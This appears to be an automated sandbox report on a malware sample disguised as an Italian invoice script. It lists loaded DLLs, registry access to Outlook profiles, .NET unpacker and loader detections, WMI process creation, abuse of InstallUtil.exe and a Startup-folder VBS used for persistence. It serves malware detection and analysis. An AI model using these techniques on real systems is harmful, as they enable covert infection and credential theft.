Source: C:\Windows\System32\wscript.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Section loaded: atl.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Section loaded: msisip.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Section loaded: wshext.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Section loaded: appxsip.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Section loaded: opcservices.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: napinsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wshbth.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: nlaapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winrnr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dpapi.dll

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Fattura-24SC-99245969925904728562.vbs

Static file information: File size 2500641 > 1048576

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1423198807.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000005437000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000006386000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.00000000061E6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1423198807.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000005437000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000006386000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.00000000061E6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: powershell.pdbUGP source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000000.1312087444.00000000003D1000.00000020.00000001.01000000.00000005.sdmp, OSDescription.vbs.exe, 0000000F.00000000.1514068078.0000000000348000.00000020.00000001.01000000.0000000C.sdmp, OSDescription.vbs.exe.13.dr, Fattura-24SC-99245969925904728562.vbs.exe.4.dr
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: powershell.pdb source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000000.1312087444.00000000003D1000.00000020.00000001.01000000.00000005.sdmp, OSDescription.vbs.exe, 0000000F.00000000.1514068078.0000000000348000.00000020.00000001.01000000.0000000C.sdmp, OSDescription.vbs.exe.13.dr, Fattura-24SC-99245969925904728562.vbs.exe.4.dr
Source:	Binary string: protobuf-net.pdb source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.8400000.2.raw.unpack, MerchantContainerStrategy.cs	.Net Code: SearchFilter System.Reflection.Assembly.Load(byte[])
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.8910000.4.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.8910000.4.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.8910000.4.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.8910000.4.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.8910000.4.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull

Yara detected Costura Assembly Loader

Source: Yara match	File source: 9.2.InstallUtil.exe.23e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.9f60000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.1422431718.0000000009F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1617686351.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1547078793.0000000004BC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1452882158.0000000002521000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1377378668.0000000005095000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1452651093.00000000023E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Fattura-24SC-99245969925904728562.vbs.exe PID: 7764, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7928, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: OSDescription.vbs.exe PID: 6024, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 2980, type: MEMORYSTR

Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Code function: 7_2_0A0306A0 push ebx; retf	7_2_0A0306A3
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Code function: 7_2_0A03BD0A push B9FFFFFFh; ret	7_2_0A03BD14
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Code function: 7_2_0A03E584 push F0B9046Ah; ret	7_2_0A03E58A
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Code function: 7_2_0A345319 push B9FFFFE5h; ret	7_2_0A34531E
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Code function: 7_2_0A34245C push B9FFFFE4h; ret	7_2_0A342472
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Code function: 7_2_0A3438E2 push B9FFFFF9h; ret	7_2_0A3438E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_00A521E1 push 8BD88B00h; retf	9_2_00A521E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_023DEE10 push edi; ret	9_2_023DEE16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04C335FF push ds; ret	9_2_04C3363A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04C33547 push es; ret	9_2_04C3354A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04C3354B push ss; ret	9_2_04C33562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04C33563 push ds; ret	9_2_04C335A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04C33687 push es; ret	9_2_04C33692
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04C337CB push ds; ret	9_2_04C337DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04C337F3 push es; ret	9_2_04C337F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04C337F7 push cs; ret	9_2_04C337FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04C33797 push ds; ret	9_2_04C3379A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04C337A7 push ss; ret	9_2_04C337AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04C33707 push es; ret	9_2_04C3370A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04C3371B push ss; ret	9_2_04C33726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04C33727 push cs; ret	9_2_04C3372A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04C31897 push BE000000h; retn 0000h	9_2_04C3189C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04C3389B push ds; ret	9_2_04C338A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04C338A7 push es; ret	9_2_04C338AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04C338AB push cs; ret	9_2_04C338B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04C33807 push cs; ret	9_2_04C3380A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04C339EF push ss; ret	9_2_04C339F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04C33983 push cs; ret	9_2_04C33986
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04C33987 push ds; ret	9_2_04C3398A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04C33997 push cs; ret	9_2_04C3399E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04C3399F push es; ret	9_2_04C339B6

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Windows\System32\cmd.exe	File created: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe			Jump to dropped file
Source: C:\Windows\System32\cmd.exe	File created: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe			Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Jump to behavior

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OSDescription.vbs

Jump to dropped file

Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OSDescription.vbs

Jump to behavior

Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OSDescription.vbs

Jump to behavior

Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
